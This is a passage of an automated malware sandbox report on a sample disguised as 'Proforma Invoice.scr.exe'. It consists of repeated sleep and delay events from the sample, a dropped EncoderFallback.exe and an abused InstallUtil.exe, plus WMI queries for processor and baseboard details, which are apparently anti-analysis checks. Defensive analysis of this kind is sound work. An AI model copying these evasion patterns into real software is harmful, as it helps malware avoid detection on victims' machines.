                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6008Thread sleep time: -597922s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6008Thread sleep time: -597812s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6008Thread sleep time: -597703s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6008Thread sleep time: -597594s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6008Thread sleep time: -597484s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6008Thread sleep time: -597375s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6008Thread sleep time: -597265s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6008Thread sleep time: -597156s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6008Thread sleep time: -597046s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6008Thread sleep time: -596936s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6008Thread sleep time: -596824s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6008Thread sleep time: -596718s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6008Thread sleep time: -596609s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6008Thread sleep time: -596500s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6008Thread sleep time: -596317s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6008Thread sleep time: -596180s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6008Thread sleep time: -596030s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6008Thread sleep time: -595898s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6008Thread sleep time: -595653s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6008Thread sleep time: -595531s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6008Thread sleep time: -595422s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6008Thread sleep time: -595313s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6008Thread sleep time: -595188s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6008Thread sleep time: -595078s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6008Thread sleep time: -594969s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6008Thread sleep time: -594844s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6008Thread sleep time: -594734s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6008Thread sleep time: -594616s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6008Thread sleep time: -594498s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6008Thread sleep time: -594389s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6008Thread sleep time: -594281s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6008Thread sleep time: -594171s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6008Thread sleep time: -594062s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6008Thread sleep time: -593953s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exe TID: 1936Thread sleep time: -27670116110564310s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exe TID: 1936Thread sleep time: -100000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exe TID: 6368Thread sleep count: 3989 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exe TID: 6368Thread sleep count: 3991 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exe TID: 1936Thread sleep time: -99890s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exe TID: 1936Thread sleep time: -99780s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exe TID: 1936Thread sleep time: -99671s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exe TID: 1936Thread sleep time: -99561s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exe TID: 1936Thread sleep time: -99451s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exe TID: 1936Thread sleep time: -99343s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exe TID: 1936Thread sleep time: -99203s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exe TID: 1936Thread sleep time: -99013s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exe TID: 1936Thread sleep time: -98894s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exe TID: 1936Thread sleep time: -98765s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exe TID: 1936Thread sleep time: -98424s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exe TID: 1936Thread sleep time: -98273s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exe TID: 1936Thread sleep time: -98156s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exe TID: 1936Thread sleep time: -98046s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exe TID: 1936Thread sleep time: -97937s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exe TID: 1936Thread sleep time: -97827s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exe TID: 1936Thread sleep time: -97718s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exe TID: 1936Thread sleep time: -97609s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exe TID: 1936Thread sleep time: -97499s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exe TID: 1936Thread sleep time: -97390s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exe TID: 1936Thread sleep time: -97281s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exe TID: 1936Thread sleep time: -97171s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exe TID: 1936Thread sleep time: -97062s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exe TID: 1936Thread sleep time: -96952s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exe TID: 1936Thread sleep time: -96843s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exe TID: 1936Thread sleep time: -96734s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exe TID: 1936Thread sleep time: -96624s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exe TID: 1936Thread sleep time: -96515s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exe TID: 1936Thread sleep time: -96406s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exe TID: 1936Thread sleep time: -96296s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exe TID: 1936Thread sleep time: -96187s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exe TID: 1936Thread sleep time: -96070s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exe TID: 1936Thread sleep time: -95937s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exe TID: 1936Thread sleep time: -95812s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exe TID: 1936Thread sleep time: -95702s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exe TID: 1936Thread sleep time: -95588s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exe TID: 1936Thread sleep time: -95470s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612Thread sleep count: 35 > 30Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612Thread sleep time: -32281802128991695s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612Thread sleep time: -600000s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3804Thread sleep count: 1329 > 30Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612Thread sleep time: -599875s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3804Thread sleep count: 8512 > 30Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612Thread sleep time: -599766s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612Thread sleep time: -599655s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612Thread sleep time: -599547s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612Thread sleep time: -599437s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612Thread sleep time: -599328s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612Thread sleep time: -599219s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612Thread sleep time: -599109s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612Thread sleep time: -599000s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612Thread sleep time: -598891s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612Thread sleep time: -598766s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612Thread sleep time: -598641s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612Thread sleep time: -598531s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612Thread sleep time: -598421s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612Thread sleep time: -598312s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612Thread sleep time: -598203s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612Thread sleep time: -598094s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612Thread sleep time: -597984s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612Thread sleep time: -597875s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612Thread sleep time: -597766s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612Thread sleep time: -597641s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612Thread sleep time: -597516s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612Thread sleep time: -597406s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612Thread sleep time: -597297s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612Thread sleep time: -597187s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612Thread sleep time: -597078s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612Thread sleep time: -596969s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612Thread sleep time: -596859s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612Thread sleep time: -596750s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612Thread sleep time: -596641s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612Thread sleep time: -596516s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612Thread sleep time: -596391s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612Thread sleep time: -596281s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612Thread sleep time: -596172s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612Thread sleep time: -596062s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612Thread sleep time: -595953s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612Thread sleep time: -595843s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612Thread sleep time: -595734s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612Thread sleep time: -595625s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612Thread sleep time: -595516s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612Thread sleep time: -595391s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612Thread sleep time: -595266s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612Thread sleep time: -595156s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612Thread sleep time: -595047s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612Thread sleep time: -594937s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612Thread sleep time: -594828s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612Thread sleep time: -594718s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612Thread sleep time: -594609s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612Thread sleep time: -594500s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeThread delayed: delay time: 100000Jump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeThread delayed: delay time: 99875Jump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeThread delayed: delay time: 99766Jump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeThread delayed: delay time: 99656Jump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeThread delayed: delay time: 99547Jump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeThread delayed: delay time: 99438Jump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeThread delayed: delay time: 99313Jump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeThread delayed: delay time: 99188Jump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeThread delayed: delay time: 99063Jump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeThread delayed: delay time: 98953Jump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeThread delayed: delay time: 98844Jump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeThread delayed: delay time: 98628Jump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeThread delayed: delay time: 98476Jump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeThread delayed: delay time: 98373Jump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeThread delayed: delay time: 98172Jump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeThread delayed: delay time: 98031Jump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeThread delayed: delay time: 97922Jump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeThread delayed: delay time: 97774Jump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeThread delayed: delay time: 97621Jump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeThread delayed: delay time: 97486Jump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeThread delayed: delay time: 97374Jump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeThread delayed: delay time: 97262Jump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeThread delayed: delay time: 97156Jump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeThread delayed: delay time: 97047Jump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeThread delayed: delay time: 96938Jump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeThread delayed: delay time: 96828Jump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeThread delayed: delay time: 96719Jump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeThread delayed: delay time: 96610Jump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeThread delayed: delay time: 96485Jump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeThread delayed: delay time: 96360Jump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeThread delayed: delay time: 96235Jump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeThread delayed: delay time: 96110Jump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeThread delayed: delay time: 95985Jump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeThread delayed: delay time: 95860Jump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeThread delayed: delay time: 95735Jump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeThread delayed: delay time: 95610Jump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeThread delayed: delay time: 95485Jump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeThread delayed: delay time: 95360Jump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeThread delayed: delay time: 95235Jump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeThread delayed: delay time: 95110Jump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeThread delayed: delay time: 94985Jump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeThread delayed: delay time: 94860Jump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeThread delayed: delay time: 94672Jump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeThread delayed: delay time: 94542Jump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeThread delayed: delay time: 94254Jump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeThread delayed: delay time: 94121Jump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeThread delayed: delay time: 93967Jump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeThread delayed: delay time: 93858Jump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeThread delayed: delay time: 93750Jump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeThread delayed: delay time: 93641Jump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeThread delayed: delay time: 93516Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 600000Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599891Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599766Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599656Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599547Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599436Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599318Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599179Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598999Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598816Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598685Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598578Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598469Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598359Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598250Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598140Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598031Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597922Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597812Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597703Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597594Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597484Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597375Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597265Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597156Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597046Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596936Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596824Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596718Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596609Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596500Jump to behavior
